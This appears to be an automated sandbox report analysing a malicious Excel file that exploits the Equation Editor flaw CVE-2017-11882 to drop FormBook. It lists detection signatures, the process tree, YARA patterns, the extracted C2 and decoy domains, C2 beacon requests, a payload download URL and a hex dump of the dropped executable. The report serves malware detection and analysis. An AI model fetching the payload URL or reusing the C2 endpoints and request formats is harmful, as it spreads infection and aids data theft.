Loading ...

Play interactive tourEdit tour

Windows Analysis Report COAU7229898130.xlsx

Overview

General Information

Sample Name:COAU7229898130.xlsx
Analysis ID:483666
MD5:6440075843d5ae28dfccf6c9b09830c2
SHA1:fb5ea7b3defc0c15177429caaf45cdddd80cac7c
SHA256:22c19360c2a9ee4aaa12439aa1c3ace0ecc3287e0b61481f21619e4bb69f5157
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3064 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1528 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 940 cmdline: 'C:\Users\Public\vbc.exe' MD5: 9F2C198407F1A7D058C06CC174817DB6)
      • vbc.exe (PID: 2648 cmdline: C:\Users\Public\vbc.exe MD5: 9F2C198407F1A7D058C06CC174817DB6)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • svchost.exe (PID: 2820 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
            • cmd.exe (PID: 1840 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.southerngiggle.com/imi7/"], "decoy": ["michaelhavemeyer.com", "surukuku.com", "happyhoneybaby.com", "carlsbadbeachwear.com", "mobiledepotrd.com", "cscclothing.com", "absolutalibertas.com", "gtof.net", "zahnspange-billstedt.com", "tuzlaekspertiz.net", "card05pay.site", "thebuilders24.com", "xs-of.com", "pempekgputra.com", "campverano.com", "tutorialscorner.net", "natconsultant.com", "dogloveya.com", "meatbasedlifestyle.com", "agamdesigners.com", "aashiyanafoundation.com", "confidentialbk.com", "snowbirdsrus.com", "lechouba.com", "popuality.com", "okulekitaplari.com", "blackwelldesignco.com", "abhayart.com", "ooftclub.com", "optima9.com", "neurohubapp.com", "plucknplace.com", "adbarista.com", "crownfoamus.com", "finalformlxp.com", "somethingnewstudio.com", "motorcyclejob.asia", "hasanmedicalservice.com", "thvsjwjvy.icu", "powerlinkme.com", "sceneinnyc.com", "onpointonlinemarketing.com", "abc-staff.com", "thinoft.com", "kamishichang.com", "aronexcorp.com", "garfld.com", "namasteezeindustries.com", "359326.com", "be530.com", "acceptedsolutions.net", "tuiseyingxiang.com", "thechikspot.com", "moneysavingkitchen.com", "valueplants.com", "casabedar.com", "biotechfla.com", "weekendclones.com", "tomrings.com", "nonamecreative.com", "streetracingscanner.com", "centerforcommonground.com", "download-apps.site", "sungoldhomeliving.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.133.106.199, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 940
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2820
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 940
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2820
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2820

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.southerngiggle.com/imi7/"], "decoy": ["michaelhavemeyer.com", "surukuku.com", "happyhoneybaby.com", "carlsbadbeachwear.com", "mobiledepotrd.com", "cscclothing.com", "absolutalibertas.com", "gtof.net", "zahnspange-billstedt.com", "tuzlaekspertiz.net", "card05pay.site", "thebuilders24.com", "xs-of.com", "pempekgputra.com", "campverano.com", "tutorialscorner.net", "natconsultant.com", "dogloveya.com", "meatbasedlifestyle.com", "agamdesigners.com", "aashiyanafoundation.com", "confidentialbk.com", "snowbirdsrus.com", "lechouba.com", "popuality.com", "okulekitaplari.com", "blackwelldesignco.com", "abhayart.com", "ooftclub.com", "optima9.com", "neurohubapp.com", "plucknplace.com", "adbarista.com", "crownfoamus.com", "finalformlxp.com", "somethingnewstudio.com", "motorcyclejob.asia", "hasanmedicalservice.com", "thvsjwjvy.icu", "powerlinkme.com", "sceneinnyc.com", "onpointonlinemarketing.com", "abc-staff.com", "thinoft.com", "kamishichang.com", "aronexcorp.com", "garfld.com", "namasteezeindustries.com", "359326.com", "be530.com", "acceptedsolutions.net", "tuiseyingxiang.com", "thechikspot.com", "moneysavingkitchen.com", "valueplants.com", "casabedar.com", "biotechfla.com", "weekendclones.com", "tomrings.com", "nonamecreative.com", "streetracingscanner.com", "centerforcommonground.com", "download-apps.site", "sungoldhomeliving.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: COAU7229898130.xlsxVirustotal: Detection: 35%Perma Link
          Source: COAU7229898130.xlsxReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://103.133.106.199/rbi/vbc.exeAvira URL Cloud: Label: malware
          Source: 7.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
          Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514322943.0000000000549000.00000004.00000020.sdmp
          Source: global trafficDNS query: name: www.359326.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.133.106.199:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.133.106.199:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 67MB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.thvsjwjvy.icu
          Source: C:\Windows\explorer.exeDomain query: www.carlsbadbeachwear.com
          Source: C:\Windows\explorer.exeDomain query: www.biotechfla.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.91.1.126 80
          Source: C:\Windows\explorer.exeNetwork Connect: 47.91.170.222 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeDomain query: www.359326.com
          Source: C:\Windows\explorer.exeDomain query: www.absolutalibertas.com
          Source: C:\Windows\explorer.exeDomain query: www.crownfoamus.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.southerngiggle.com/imi7/
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz HTTP/1.1Host: www.thvsjwjvy.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz HTTP/1.1Host: www.biotechfla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz HTTP/1.1Host: www.absolutalibertas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.133.106.199 103.133.106.199
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:13:26 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 07:48:09 GMTETag: "a7e00-5cc03eb5c1717"Accept-Ranges: bytesContent-Length: 687616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 39 a5 41 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 0a 00 00 6e 00 00 00 00 00 00 22 2d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 2c 0a 00 4f 00 00 00 00 40 0a 00 a0 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 0d 0a 00 00 20 00 00 00 0e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 6b 00 00 00 40 0a 00 00 6c 00 00 00 10 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 2d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 00 9e 00 00 28 8d 01 00 03 00 00 00 51 01 00 06 28 2b 02 00 a8 01 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 92 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 0d 00 00 06 00 02 72 01 00 00 70 02 28 02 00 00 06 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 04 00 00 04 02 28 05 00 00 06 6f 17 00 00 0a 00 02 7b 05 00 00 04 72 15 00 00 70 02 28 03 00 00 06 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 06 00 00 04 02 28 06 00 00 06 6f 17 00 00 0a 00 02 7b 07 00 00 04 02 28 07 00 00 06 6f 17 00 00 0a 00 02 7b 08 00 00 04 02 28 04 00 00 06 6f 17 00 00 0a 00 2a 00 00 13 30 03 00 5f 00 00 00 01 00 00 11 00 28 18 00 00 0a d0 05 00 00 01 28 19 00 00 0a 16 6f 1a 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 29 00 06 16 9a 74 05 00 00 01 0c 08 6f 1b 00 00 0a 72 2d 00 00 70 28 1c 00 00 0a 0d 09 2c 0a 08 6f 1b 00 00 0a 13 04 2b 14 00 28 18 00 00 0a 6f 1d 00 00 0a 28 1e 00 00 0a 13 04 2b 00 11 04 2a 00 13 30 01 00 1a 00 00 00 02 00 00 11 00 28 18 00 00 0a 6f 1f 00 00 0a 6f 20 00 00 0a
          Source: global trafficHTTP traffic detected: GET /rbi/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.106.199Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
